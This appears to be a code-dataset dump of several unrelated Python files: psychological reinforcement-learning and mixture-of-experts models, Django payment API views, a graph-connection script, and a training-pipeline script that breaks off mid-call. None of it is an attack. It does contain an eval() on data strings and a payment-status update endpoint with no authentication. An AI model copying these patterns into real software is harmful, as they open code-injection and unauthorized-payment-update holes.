trialUpdate(self,s1,s2,a1,a2,r,alpha1,alpha2,lam):\n # update TD values\n delta1 = self.updateQTD(0,s1, a1, s2, a2, alpha1)\n delta2 = self.updateQTD(r, s2, a2, alpha=alpha2)\n self.Q_TD_values[(s1, a1)] += alpha1*lam*delta2\n # update MB values\n self.transition_counts[(a1,s2)] += 1\n # define T:\n if (self.transition_counts[(0,1)]+self.transition_counts[(1,2)]) > \\\n (self.transition_counts[(0,2)]+self.transition_counts[(1,1)]):\n T = {(0,1):.7, (0,2):.3, (1,1):.3, (1,2):.7}\n else: \n T = {(0,1):.3, (0,2):.7, (1,1):.7, (1,2):.3}\n self.updateQMB(T)\n \n def get_softmax_probs(self,stages,last_choice):\n W = self.W\n if type(stages) != list:\n stages = [stages]\n # stage one and two choices\n P_action = numpy.zeros(2)\n # choice probabilities\n choice_probabilities = []\n for stage in stages:\n for i,a in enumerate(self.stage_action_list[stage]):\n Qnet = (W)*self.Q_MB_values[stage,a] + (1-W)*self.Q_TD_values[stage,a]\n repeat = (self.p*(a==last_choice))\n P_action[i] = exp(self.B1*(Qnet+repeat))\n P_action/=numpy.sum(P_action)\n choice_probabilities.append(P_action.copy())\n return choice_probabilities\n \n def run_trial(self,trial,last_choice):\n s1 = int(trial['stage']); s2 = int(trial['stage_second'])\n a1 = int(trial['stim_selected_first']); a2 = int(trial['stim_selected_second'])\n r = int(trial['feedback'])\n # return probability of all actions\n probs1, probs2 = self.get_softmax_probs([s1,s2],last_choice)\n # get probability of selected actions\n Pa1 = probs1[a1]\n Pa2 = probs2[self.stage_action_list[s2].index(a2)]\n self.trialUpdate(s1,s2,a1,a2,r,self.alpha1,self.alpha2,self.lam)\n return Pa1,Pa2\n \n def run_trials(self, df):\n # run trials\n last_choice = -1\n action_probs = []\n Q_vals = []\n MB_vals = []\n for i,trial in df.iterrows():\n Q_vals.append(self.Q_TD_values.copy())\n MB_vals.append(self.Q_MB_values.copy())\n Pa1, Pa2 = self.run_trial(trial,last_choice)\n action_probs.append((Pa1,Pa2))\n last_choice = trial['stim_selected_first']\n self.sum_neg_ll = numpy.sum(-numpy.log(list(zip(*action_probs))[0])) + numpy.sum(-numpy.log(list(zip(*action_probs))[1])) \n \n def simulate(self, ntrials=10):\n trials = []\n reward_probs = numpy.random.rand(6)*.5+.25 #rewards for each action\n reward_probs[0:2] = 0\n transition_probs = [.7,.3] #transition to new stages (probability to go to stage 2)\n # initial conditions\n last_choice = -1\n for trial in range(ntrials):\n s1 = 0\n # get first choice without knowing the second choice\n 
first_action_probs = self.get_softmax_probs(s1,last_choice)[0]\n a1 = numpy.random.choice(self.stage_action_list[s1], p=first_action_probs)\n # get second stage\n s2 = numpy.random.binomial(1,transition_probs[a1])+1\n second_action_probs = self.get_softmax_probs(s2,last_choice)[0]\n a2 = numpy.random.choice(self.stage_action_list[s2], p=second_action_probs)\n feedback = numpy.random.binomial(1,reward_probs[a2]) \n trials.append({'stage':s1, 'stage_second':s2,\n 'stim_selected_first':a1,'stim_selected_second':a2,\n 'feedback':feedback,\n 'first_action_prob': first_action_probs[a1],\n 'second_action_prob': second_action_probs[self.stage_action_list[s2].index(a2)]})\n self.trialUpdate(s1,s2,a1,a2,feedback,self.alpha1,self.alpha2,self.lam)\n last_choice = a1\n reward_probs[2:]+=numpy.random.randn(4)*.025\n reward_probs[2:] = numpy.maximum(numpy.minimum(reward_probs[2:],.75),.25)\n return trials\n \n def get_neg_ll(self):\n return self.sum_neg_ll\n\n\n# Functions to define Hierarchical Rule MoE Model (Frank & Badre, 2011)\nclass Flat_SubExpert():\n def __init__(self, features, data, kappa):\n self.kappa = kappa # kappaerature for softmax\n self.features = features\n self.feature_types = [numpy.unique(data.loc[:, f]) for f in features]\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n # create dictionary of learned beta parameters\n self.reward_probabilities = {}\n for key in product(*self.feature_types, self.actions):\n self.reward_probabilities[key] = {'a':1, 'b': 1}\n \n def update(self, trial):\n correct = trial.correct\n action = trial.key_press\n features = trial[self.features].tolist()\n update_key = 'a' if correct else 'b'\n self.reward_probabilities[tuple(features + [action])][update_key] += 1\n \n def get_action_probs(self, trial):\n def subset(lst1, lst2):\n \"\"\"test if lst1 is subset of lst2\"\"\"\n return set(lst1) <= set(lst2)\n features = trial[self.features].tolist()\n key_subset = [k for k in self.reward_probabilities.keys() if subset(features,k)]\n action_probs = {}\n for key in key_subset:\n raw_prob = beta(**self.reward_probabilities[key]).mean()\n # take softmax\n prob = numpy.e**(raw_prob/self.kappa)\n action_probs[key[-1]] = prob\n # normalize by total\n sum_probs = sum(action_probs.values())\n action_probs = {k: v/sum_probs for k,v in action_probs.items()}\n return action_probs\n \nclass Hierarchical_SubExpert():\n \"\"\" Suboridinate Hierarchical Expert\n \n This class instantatiates an expert that learns about one or more features\n contextualized on another feature. 
In the context of the model, this class\n is used for simple experts that learn (for example) the reward probabilities\n of (shape|color).\n \"\"\"\n def __init__(self, features, context, data, kappa):\n self.kappa = kappa # kappaerature for softmax\n self.features = features\n self.feature_types = [numpy.unique(data.loc[:, f]) for f in features]\n self.context = context\n self.context_types = numpy.unique(data.loc[:, context])\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n # create dictionary of learned beta parameters\n self.reward_probabilities = {}\n for c in self.context_types:\n self.reward_probabilities[c] = {}\n for key in product(*self.feature_types, self.actions):\n self.reward_probabilities[c][key] = {'a':1, 'b': 1}\n \n def update(self, trial):\n correct = trial.correct\n action = trial.key_press\n features = trial[self.features].tolist()\n context = trial[self.context]\n update_key = 'a' if correct else 'b'\n self.reward_probabilities[context][tuple(features + [action])][update_key] += 1\n \n def get_action_probs(self, trial):\n def subset(lst1, lst2):\n \"\"\"test if lst1 is subset of lst2\"\"\"\n return set(lst1) <= set(lst2)\n features = trial[self.features].tolist()\n context = trial[self.context]\n key_subset = [k for k in self.reward_probabilities[context].keys() if subset(features,k)]\n action_probs = {}\n for key in key_subset:\n raw_prob = beta(**self.reward_probabilities[context][key]).mean()\n # take softmax\n prob = numpy.e**(raw_prob/self.kappa)\n action_probs[key[-1]] = prob\n # normalize by total\n sum_probs = sum(action_probs.values())\n action_probs = {k: v/sum_probs for k,v in action_probs.items()}\n return action_probs\n\n\nclass Expert():\n def update_confidence(self, trial):\n choice = trial.key_press\n r = trial.correct # reward\n e_action_probs = [e.get_action_probs(trial) for e in self.experts]\n # models are assigned credit for the choice if their action_probs\n # gave a higher value to the actual choice than the others\n credit_assignment = []\n for action_probs in e_action_probs:\n choice_prob = action_probs[choice]\n others = [v for k,v in action_probs.items() if k != choice]\n credited = all(numpy.less(others, choice_prob))\n credit_assignment.append(credited)\n # update \n # if the expert contributed the the choice, set reward to \"r\"\n # if the expert did not contribute, set the reward to 1-r.\n updates = [r*c+(1-r)*(1-c) for c in credit_assignment]\n # update alpha and beta based on updates\n for i, update in enumerate(updates):\n update_param = ['b','a'][int(update)]\n self.confidences[i][update_param] += 1\n \n def update_experts(self, trial):\n for e in self.experts:\n # if the subordinate experts are \"subordinate\" they only have an\n # update method. otherwise they have an update_experts method\n try:\n e.update(trial)\n except AttributeError:\n e.update_confidence(trial)\n e.update_experts(trial)\n \n def get_action_probs(self, trial):\n e_action_probs = [e.get_action_probs(trial) for e in self.experts]\n e_confidences = self.get_expert_confidences(trial)\n action_probs = {}\n for action in self.actions:\n # get action probs across experts\n probs = [e[action] for e in e_action_probs]\n # weight probs by expert attention\n weighted_prob = numpy.dot(probs, e_confidences)\n action_probs[action] = weighted_prob\n return action_probs \n \nclass Flat_Expert(Expert):\n \"\"\" Model for Hierarchical Rule Learning Task\n \n ref: Frank, M. J., & Badre, D. (2012). Mechanisms of hierarchical... 
(Part1)\n \"\"\"\n def __init__(self, data, kappa, zeta, alphaC, alphaO, alphaS,\n beta2, beta3):\n \"\"\" Initialize the model\n \n Args:\n data: dataframe of hierarchical rule task\n kappa: kappaerature for individual experts softmax function\n zeta: softmax parameter to arbitrate between experts\n uni_confidences: initial alpha and beta params\n for unidimensional experts. These should be supplied in\n orient, color, shape order.\n full_confidence: initial alpha and beta perams for fully\n conjunctive expert\n beta2: beta parameter for 2-way conjunctions. Alpha parameter\n is determined by unidimensional experts\n \"\"\"\n self.zeta = zeta\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n # single feature\n self.orient_e = Flat_SubExpert(['orientation'], data, kappa)\n self.color_e = Flat_SubExpert(['border'], data, kappa)\n self.shape_e = Flat_SubExpert(['stim'], data, kappa)\n # 2 combination \n self.orient_color_e = Flat_SubExpert(['orientation', 'border'], data, kappa)\n self.orient_shape_e = Flat_SubExpert(['orientation', 'stim'], data, kappa)\n self.shape_color_e = Flat_SubExpert(['stim', 'border'], data, kappa) \n # all 3\n self.all_e = Flat_SubExpert(['orientation','border','stim'], data,kappa)\n self.experts = [self.orient_e,\n self.color_e,\n self.shape_e,\n self.orient_color_e,\n self.orient_shape_e,\n self.shape_color_e,\n self.all_e]\n # create disctionary of params for beta distributions representing\n # the confidence in each expert\n O_confidence = {'a': 1+alphaO, 'b': 2}\n C_confidence = {'a': 1+alphaC, 'b': 2}\n S_confidence = {'a': 1+alphaS, 'b': 2}\n OC_confidence = {'a': 1+(alphaO+alphaC)/2, 'b': 2+beta2}\n OS_confidence = {'a': 1+(alphaO+alphaS)/2, 'b': 2+beta2}\n SC_confidence = {'a': 1+(alphaS+alphaC)/2, 'b': 2+beta2}\n OSC_confidence = {'a': 1+(alphaO+alphaS+alphaC)/3, 'b': 3+beta3}\n\n \n self.confidences = [O_confidence,\n C_confidence,\n S_confidence,\n OC_confidence,\n OS_confidence,\n SC_confidence,\n OSC_confidence]\n \n def get_expert_confidences(self, trial):\n # get attention weights (softmax of confidences)\n e_confidences = [numpy.e**(beta(**p).mean()/self.zeta) for p in self.confidences]\n e_confidences = [i/sum(e_confidences) for i in e_confidences]\n return e_confidences\n \nclass Hierarchical_Expert(Expert):\n \"\"\" Hierarchical expert with two subordinate\n \n This expert reflects the combination of two subordinate experts over one\n context. 
For example, if \"color\" is the context, the two subordinate would\n be shape|color and orientation|color\n \"\"\"\n def __init__(self, subfeatures, context, data, kappa, zeta):\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n self.zeta = zeta\n self.context = context\n self.context_types = numpy.unique(data.loc[:, context])\n # define subordinate condition experts\n self.experts = []\n for feature in subfeatures:\n expert = Hierarchical_SubExpert([feature], context, data, kappa)\n self.experts.append(expert)\n # create disctionary of params for beta distributions representing\n # the confidence in each expert\n self.confidences = {}\n for c in self.context_types:\n self.confidences[c] = [{'a': 1, 'b': 1} for _ in range(len(self.experts))]\n\n def update_confidence(self, trial):\n choice = trial.key_press\n r = trial.correct # reward\n context = trial[self.context]\n e_action_probs = [e.get_action_probs(trial) for e in self.experts]\n # models are assigned credit for the choice if their action_probs\n # gave a higher value to the actual choice than the others\n credit_assignment = []\n for action_probs in e_action_probs:\n choice_prob = action_probs[choice]\n others = [v for k,v in action_probs.items() if k != choice]\n credited = all(numpy.less(others, choice_prob))\n credit_assignment.append(credited)\n # update \n # if the expert contributed the the choice, set reward to \"r\"\n # if the expert did not contribute, set the reward to 1-r.\n updates = [r*c+(1-r)*(1-c) for c in credit_assignment]\n # update alpha and beta based on updates\n for i, update in enumerate(updates):\n update_param = ['b','a'][int(update)]\n self.confidences[context][i][update_param] += 1\n \n def get_expert_confidences(self, trial):\n # get attention weights (softmax of confidences)\n c = trial[self.context]\n e_confidences = [numpy.e**(beta(**p).mean()/self.zeta) for p in self.confidences[c]]\n e_confidences = [i/sum(e_confidences) for i in e_confidences]\n return e_confidences\n \nclass Hierarchical_SuperExpert(Expert):\n \"\"\" Instantiates the superordinate hierarchical expert\n \n This class instantiates three hierarchical experts each with a different\n context - either color, orientation, or shape\n \"\"\"\n def __init__(self, data, kappa, zeta):\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n # define hierarchical experts\n self.color_expert = Hierarchical_Expert(['stim','orientation'], 'border', data, kappa, zeta)\n self.orientation_expert = Hierarchical_Expert(['stim','border'], 'orientation', data, kappa, zeta)\n self.shape_expert = Hierarchical_Expert(['border','orientation'], 'stim', data, kappa, zeta) \n self.experts = [self.color_expert, \n self.orientation_expert, \n self.shape_expert]\n # create disctionary of params for beta distributions representing\n # the confidence in each expert\n self.confidences = [{'a': 1, 'b': 1} for _ in range(len(self.experts))]\n \n\n def get_expert_confidences(self, trial):\n # get attention weights - unclear if softmax\n e_confidences = [beta(**p).mean() for p in self.confidences]\n #e_confidences = [numpy.e**(beta(**p).mean()/self.zeta) for p in self.confidences\n e_confidences = [i/sum(e_confidences) for i in e_confidences]\n return e_confidences\n \nclass MoE_Model(Expert):\n def __init__(self, data, kappa, zeta, xi, alphaC, alphaO, alphaS,\n beta2, beta3, beta_hierarchy):\n \"\"\"\n \n Args:\n data: dataframe for hierarchical rule task\n kappa: softmax parameter for action probabilities, passed to\n 
subordinate experts\n zeta: softmax parameter for arbitration between subordinate experts\n of hierarchical and flat experts\n xi: softmax parameter for arbitration between \n hierarchical and flat experts\n \"\"\"\n self.actions = sorted(numpy.unique([a for a in data.key_press if a > 0]))\n self.xi = xi\n # set up experts\n self.hierarchical_expert = Hierarchical_SuperExpert(data, kappa, zeta)\n self.flat_expert = Flat_Expert(data, kappa, zeta, alphaC, alphaO, alphaS,\n beta2, beta3)\n self.experts = [self.hierarchical_expert, self.flat_expert]\n # create disctionary of params for beta distributions representing\n # the confidence in each expert\n self.confidences = [{'a': 1, 'b': beta_hierarchy}, {'a': 1, 'b': 1}]\n \n \n def get_expert_confidences(self, trial):\n # get attention weights - unclear if softmax\n e_confidences = [numpy.e**(beta(**p).mean()/self.xi) for p in self.confidences]\n e_confidences = [i/sum(e_confidences) for i in e_confidences]\n return e_confidences\n \n def get_all_confidences(self, trial):\n confidences = {}\n confidences['hierarchy'] = self.get_expert_confidences(trial)[0]\n \n hierarchical_expert = self.experts[0]\n color, orientation, shape = hierarchical_expert.get_expert_confidences(trial)\n confidences['hier_color'] = color\n confidences['hier_orientation'] = orientation\n confidences['hier_shape'] = shape\n \n flat_expert = self.experts[1]\n flat_confidences = flat_expert.get_expert_confidences(trial)\n confidences['flat_orientation'] = flat_confidences[0]\n confidences['flat_color'] = flat_confidences[1]\n confidences['flat_shape'] = flat_confidences[2]\n confidences['flat_OC'] = flat_confidences[3]\n confidences['flat_OS'] = flat_confidences[4]\n confidences['flat_CS'] = flat_confidences[5]\n confidences['flat_OSC'] = flat_confidences[6]\n \n return confidences\n \n \nfrom lmfit import Minimizer, Parameters\n# Functions to define Shift Task model (Wilson & Niv, 2012)\nclass fRL_Model():\n def __init__(self, data, decay_weights=False,\n verbose=False):\n self.data = data\n # scrub data\n self.data = data.query('rt != -1')\n # get features\n stim_features = json.loads(data.stims[0])\n colors = [i['color'] for i in stim_features]\n patterns = [i['pattern'] for i in stim_features]\n shapes = [i['shape'] for i in stim_features]\n all_features = colors+patterns+shapes\n # set up class vars\n self.weights = {f: 0 for f in all_features}\n self.decay = 0\n self.beta=1\n self.eps=0\n self.lr = .01\n self.decay_weights=decay_weights\n self.verbose=verbose\n \n def get_stim_value(self, stim):\n return numpy.sum([self.weights[v] for v in stim.values()]) \n \n def get_choice_prob(self, trial):\n stims = json.loads(trial.stims)\n stim_values = [self.get_stim_value(stim) for stim in stims]\n # compute softmax decision probs\n f = lambda x: numpy.e**(self.beta*x)\n softmax_values = [f(v) for v in stim_values]\n normalized = [v/numpy.sum(softmax_values) for v in softmax_values]\n # get prob of choice\n choice_prob = normalized[int(trial.choice_position)]\n # incorporate eps\n choice_prob = (1-self.eps)*choice_prob + (self.eps)*(1/3)\n return choice_prob\n \n def get_params(self):\n return {'beta': self.beta,\n 'decay': self.decay,\n 'lr': self.lr,\n 'eps': self.eps}\n \n def update(self, trial):\n if type(trial.choice_stim) == str:\n choice = eval(trial.choice_stim)\n else:\n choice = trial.choice_stim\n reward = trial.feedback\n value = self.get_stim_value(choice)\n delta = self.lr*(reward-value)\n for key in choice.values():\n self.weights[key] += delta\n # decay non 
choice features\n for key in set(self.weights.keys()) - set(choice.values()):\n self.weights[key] *= (1-self.decay)\n \n def run_data(self):\n probs = []\n attention_weights = []\n for i, trial in self.data.iterrows():\n probs.append(self.get_choice_prob(trial))\n self.update(trial)\n attention_weights.append(self.weights.copy())\n return probs, attention_weights\n \n def optimize(self):\n def loss(pars):\n #unpack params\n parvals = pars.valuesdict()\n self.beta = parvals['beta']\n self.decay = parvals['decay']\n self.lr = parvals['lr']\n self.eps = parvals['eps']\n probs, attention_weights = self.run_data()\n neg_log_likelihood = -numpy.sum(numpy.log(probs))\n return neg_log_likelihood\n \n def track_loss(params, iter, resid):\n if iter%100==0:\n print(iter, resid)\n \n params = Parameters()\n if self.decay_weights:\n params.add('decay', value=0, min=0, max=1)\n else:\n params.add('decay', value=0, vary=False)\n params.add('beta', value=1, min=.01, max=100)\n params.add('eps', value=0, min=0, max=1)\n params.add('lr', value=.1, min=.000001, max=1)\n \n if self.verbose==False:\n fitter = Minimizer(loss, params)\n else:\n fitter = Minimizer(loss, params, iter_cb=track_loss)\n fitter.scalar_minimize(method='Nelder-Mead', options={'xatol': 1e-3,\n 'maxiter': 200})\n\n \n \n \n ","sub_path":"expanalysis/experiments/psychological_models.py","file_name":"psychological_models.py","file_ext":"py","file_size_in_byte":24417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"559379788","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets, status\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom core.models import Payment\nfrom payment import serializers\nfrom .tools import Tools\n\n\nclass PaymentViewSet(viewsets.ModelViewSet):\n \"\"\"\n list:\n list all payments\n create:\n create a payments from current user\n retrieve:\n get a payment by id campaing\n \"\"\"\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated,)\n queryset = Payment.objects.all()\n serializer_class = serializers.PaymentSerializer\n\n def get_queryset(self):\n queryset = Payment.objects.all()\n return queryset\n\n def retrieve(self, request, pk):\n queryset = Payment.objects.all()\n current_payment = get_object_or_404(queryset, pk=pk)\n serializer = self.serializer_class(current_payment)\n return Response(\n {'data': serializer.data},\n status=status.HTTP_200_OK\n )\n\n def perform_create(self, serializer):\n return serializer.save(user=self.request.user)\n\n\nclass PaymentInCome(viewsets.ModelViewSet):\n \"\"\"\n list:\n show all payments\n update:\n update status payment by request from company payment\n \"\"\"\n serializer_class = serializers.PayIncomeSerializer\n\n def get_queryset(self):\n queryset = Payment.objects.all()\n return queryset\n\n def update(self, request, pk=None):\n try:\n c_tools = Tools()\n current_user = c_tools.validate_user(request.data.get('user'))\n current_campaing = c_tools.validate_campaing(\n request.data.get('campaing')\n )\n current_payment = Payment.objects.get(\n user=current_user,\n campaing=current_campaing\n )\n serializer = self.serializer_class(\n current_payment,\n data=request.data\n )\n\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(\n {'data': 'payment update successfully.'},\n 
status=status.HTTP_200_OK\n )\n\n return Response(\n {'error': 'something wrong.'},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n except Exception as err:\n return Response({'error': f'{err}'})\n","sub_path":"apiuser/payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"317099204","text":"# -*- coding: utf-8 -*-\n\nimport json\n\n\nwith open('nodes.json', 'r') as f:\n nodes = json.load(f)\n\nconnections = []\n\nfor node in nodes:\n code = node['code']\n for connection in node['connections']:\n arrivalCode = connection['code']\n\n c = {\n 'code1': code,\n 'code2': arrivalCode\n }\n\n cInverted = {\n 'code1': arrivalCode,\n 'code2': code\n }\n\n if (c not in connections and cInverted not in connections):\n connections.append(c)\n\nwith open('connections.json', 'w') as f:\n json.dump(connections, f, ensure_ascii=False, separators=(',', ':'))\n\nprint('len(connections)')\nprint(len(connections))\n# => 12687\n","sub_path":"node/makeConnections.py","file_name":"makeConnections.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"83769679","text":"'''\n train main class\n\n @author neucrack@sipeed\n @license Apache 2.0 © 2020 Sipeed Ltd\n'''\n\nimport os, sys\nroot_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\"))\nsys.path.append(root_path)\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\n\n\nfrom classifier import Classifier\nfrom detector import Detector\nimport requests\nimport tempfile\nimport shutil\nfrom utils import gpu_utils, isascii\nfrom utils.logger import Logger, Fake_Logger\nfrom instance import config\nimport time\nfrom datetime import datetime\nimport subprocess\nimport zipfile\nimport traceback\nimport json\nfrom enum import Enum\n\nclass TrainType(Enum):\n CLASSIFIER = 0\n DETECTOR = 1\n\nclass TrainFailReason(Enum):\n ERROR_NONE = 0\n ERROR_INTERNAL = 1\n ERROR_DOWNLOAD_DATASETS = 2\n ERROR_NODE_BUSY = 3\n ERROR_PARAM = 4\n ERROR_CANCEL = 5\n\n\nclass Train():\n def __init__(self, train_type: TrainType,\n datasets_zip,\n dataset_dir,\n out_dir):\n '''\n creat /temp/train_temp dir to train\n '''\n self.train_type = train_type\n self.datasets_zip_path = datasets_zip\n self.dataset_dir = dataset_dir\n self.temp_dir = out_dir\n assert os.path.exists(datasets_zip) or os.path.exists(dataset_dir)\n if os.path.exists(dataset_dir):\n self.datasets_dir = dataset_dir\n else:\n self.datasets_dir = \"\"\n self.temp_datasets_dir = os.path.join(self.temp_dir, \"datasets\")\n self.result_dir = os.path.join(self.temp_dir, \"result\")\n self.clean_temp_files()\n os.makedirs(self.temp_dir)\n if os.path.exists(self.result_dir):\n shutil.rmtree(self.result_dir)\n os.makedirs(self.result_dir)\n self.dataset_sample_images_path = os.path.join(self.temp_dir, \"sample_images\")\n os.makedirs(self.dataset_sample_images_path)\n self.log_file_path = os.path.join(self.temp_dir, \"train_log.log\")\n self.result_report_img_path = os.path.join(self.result_dir, \"report.jpg\")\n self.result_kmodel_path = os.path.join(self.result_dir, \"m.kmodel\")\n self.result_labels_path = os.path.join(self.result_dir, \"labels.txt\")\n self.result_boot_py_path = os.path.join(self.result_dir, \"boot.py\")\n self.tflite_path = os.path.join(self.temp_dir, \"m.tflite\")\n self.final_h5_model_path = os.path.join(self.temp_dir, \"m.h5\")\n 
self.best_h5_model_path = os.path.join(self.temp_dir, \"m_best.h5\")\n\n self.log = Logger(file_path=self.log_file_path)\n \n def __del__(self):\n # self.clean_temp_files()\n pass\n \n def clean_temp_files(self):\n if os.path.exists(self.temp_dir):\n shutil.rmtree(self.temp_dir)\n\n\n def __on_progress(self, percent, msg): # flag: progress\n self.log.i(f\"progress: {percent}%, {msg}\")\n \n def __on_success(self, result_url, warn):\n self.log.i(f\"success: out_dir: {result_url}\")\n if warn:\n self.log.w(f\"warnings:\\n {warn}\")\n\n def __on_fail(self, reson, msg, warn):\n self.log.e(f\"failed: {reson}, {msg}\")\n if warn:\n self.log.w(f\"warnings:\\n {warn}\")\n\n def __on_train_progress(self, percent, msg): # flag: progress\n percent = percent*0.97 + 1\n self.log.i(f\"progress: {percent}%, {msg}\")\n\n def train(self):\n warning_msg = \"\"\n try:\n result_url, warning_msg = self.train_process(self.log)\n self.__on_success(result_url, warning_msg)\n except Exception as e:\n info = e.args[0]\n if type(info) == tuple and len(info) == 2:\n reason = info[0]\n msg = info[1]\n self.__on_fail(reason, msg, warning_msg)\n else:\n self.__on_fail(TrainFailReason.ERROR_INTERNAL, \"node error:{}\".format(e), warning_msg)\n\n def train_process(self, log):\n '''\n raise Exception if error occurred, a tuple: (TrainFailReason, error_message)\n @return result url\n '''\n self.__on_progress(0, \"start\") # flag: progress\n self.__on_progress(1, \"start train\") # flag: progress\n \n if self.train_type == TrainType.CLASSIFIER:\n obj, prefix = self.classifier_train(log = log)\n elif self.train_type == TrainType.DETECTOR:\n obj, prefix = self.detector_train(log = log)\n else:\n raise Exception(( \"error train type, not suport\"))\n \n # check warnings\n result_warning_msg = \"\"\n result_warning_msg_path = os.path.join(self.result_dir, \"warning.txt\")\n if len(obj.warning_msg) > 0:\n result_warning_msg += \"=========================================================================\\n\"\n result_warning_msg += \"train warnings: these warn info may lead train error(accuracy loss), please check carefully\\n\"\n result_warning_msg += \"=========================================================================\\n\"\n result_warning_msg += \"训练警告: 这些警告信息可能导致训练误差,请务必仔细检查\\n\"\n result_warning_msg += \"=========================================================================\\n\\n\\n\"\n for msg in obj.warning_msg:\n result_warning_msg += \"{}\\n\\n\".format(msg)\n with open(result_warning_msg_path, \"w\") as f:\n f.write(result_warning_msg)\n\n # pack zip\n log.i(\"pack result to zip file\")\n time_now = datetime.now().strftime(\"%Y_%m_%d__%H_%M\")\n result_dir_name = \"{}_{}\".format(prefix, time_now)\n result_zip_name = \"{}.zip\".format(result_dir_name)\n result_dir = os.path.join(os.path.dirname(self.result_dir), result_dir_name)\n os.rename(self.result_dir, result_dir)\n root_dir = os.path.join(self.temp_dir, \"result_root_dir\")\n os.mkdir(root_dir)\n shutil.move(result_dir, root_dir) # 移动 result 文件夹, 到一个 root_dir下,用以压缩\n result_zip = os.path.join(self.temp_dir, result_zip_name)\n try: \n # self.zip_dir(root_dir, result_zip)\n # for old maixhub compatibility\n self.zip_dir(os.path.join(root_dir, result_dir_name), result_zip)\n except Exception:\n log.e(\"zip result fail\")\n raise Exception((TrainFailReason.ERROR_INTERNAL, \"zip result error\"))\n\n # progress 99%\n self.__on_progress(99, \"pack ok\") # flag: progress\n\n # complete\n self.__on_progress(100, \"task complete\") # flag: progress\n log.i(\"OK, 
task complete, result uri: {}\".format(result_zip))\n return result_zip, result_warning_msg\n\n def classifier_train(self, log):\n # 检测 GPU 可用,选择一个可用的 GPU 使用\n try:\n gpu = gpu_utils.select_gpu(memory_require = config.classifier_train_gpu_mem_require, tf_gpu_mem_growth=False)\n except Exception:\n gpu = None\n if gpu is None:\n if not config.allow_cpu:\n log.e(\"no free GPU\")\n raise Exception((TrainFailReason.ERROR_NODE_BUSY, \"node no enough GPU or GPU memory and not support CPU train\"))\n log.i(\"no GPU, will use [CPU]\")\n else:\n log.i(\"select\", gpu)\n\n # 启动训练\n try:\n classifier = Classifier(datasets_zip=self.datasets_zip_path, datasets_dir=self.datasets_dir, unpack_dir = self.temp_datasets_dir,\n logger=log,\n max_classes_num=config.classifier_train_max_classes_num,\n min_images_num=config.classifier_train_one_class_min_img_num,\n max_images_num=config.classifier_train_one_class_max_img_num,\n allow_reshape=False)\n except Exception as e:\n log.e(\"train datasets not valid: {}\".format(e))\n raise Exception((TrainFailReason.ERROR_PARAM, \"datasets not valid: {}\".format(str(e))))\n try:\n classifier.train(epochs=config.classifier_train_epochs, batch_size=config.classifier_train_batch_size, progress_cb=self.__on_train_progress)\n except Exception as e:\n log.e(\"train error: {}\".format(e))\n traceback.print_exc()\n raise Exception((TrainFailReason.ERROR_INTERNAL, \"error occurred when train, error: {}\".format(str(e)) ))\n\n # 训练结束, 生成报告\n log.i(\"train ok, now generate report\")\n classifier.report(self.result_report_img_path)\n\n # 生成 kmodel\n log.i(\"now generate kmodel\")\n classifier.save(self.tflite_path+\".h5\", tflite_path=self.tflite_path)\n classifier.get_sample_images(config.sample_image_num, self.dataset_sample_images_path)\n ok, msg = self.convert_to_kmodel(self.tflite_path, self.result_kmodel_path, config.ncc_kmodel_v3, self.dataset_sample_images_path)\n if not ok:\n log.e(\"convert to kmodel fail\")\n raise Exception((TrainFailReason.ERROR_INTERNAL, \"convert kmodel fail: {}\".format(msg) ))\n\n # 拷贝模板文件\n log.i(\"copy template files\")\n template_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"classifier\", \"template\")\n self.__copy_template_files(template_dir, self.result_dir)\n\n # 写入 label 文件\n replace = 'labels = [\"{}\"]'.format('\", \"'.join(classifier.labels))\n with open(self.result_labels_path, \"w\") as f:\n f.write(replace)\n with open(self.result_boot_py_path) as f:\n boot_py = f.read()\n with open(self.result_boot_py_path, \"w\") as f:\n target = 'labels = [] # labels'\n boot_py = boot_py.replace(target, replace)\n target = 'sensor.set_windowing((224, 224))'\n replace = 'sensor.set_windowing(({}, {}))'.format(classifier.input_shape[1], classifier.input_shape[0])\n boot_py = boot_py.replace(target, replace)\n f.write(boot_py)\n\n return classifier, config.classifier_result_file_name_prefix\n\n def detector_train(self, log):\n # 检测 GPU 可用,选择一个可用的 GPU 使用\n try:\n gpu = gpu_utils.select_gpu(memory_require = config.detector_train_gpu_mem_require, tf_gpu_mem_growth=False)\n except Exception:\n gpu = None\n if gpu is None:\n if not config.allow_cpu:\n log.e(\"no free GPU\")\n raise Exception((TrainFailReason.ERROR_NODE_BUSY, \"node no enough GPU or GPU memory and not support CPU train\"))\n log.i(\"no GPU, will use [CPU]\")\n else:\n log.i(\"select\", gpu)\n\n # 启动训练\n try:\n detector = Detector(input_shape=(224, 224, 3),\n datasets_zip=self.datasets_zip_path,\n datasets_dir=self.datasets_dir,\n unpack_dir = self.temp_datasets_dir,\n 
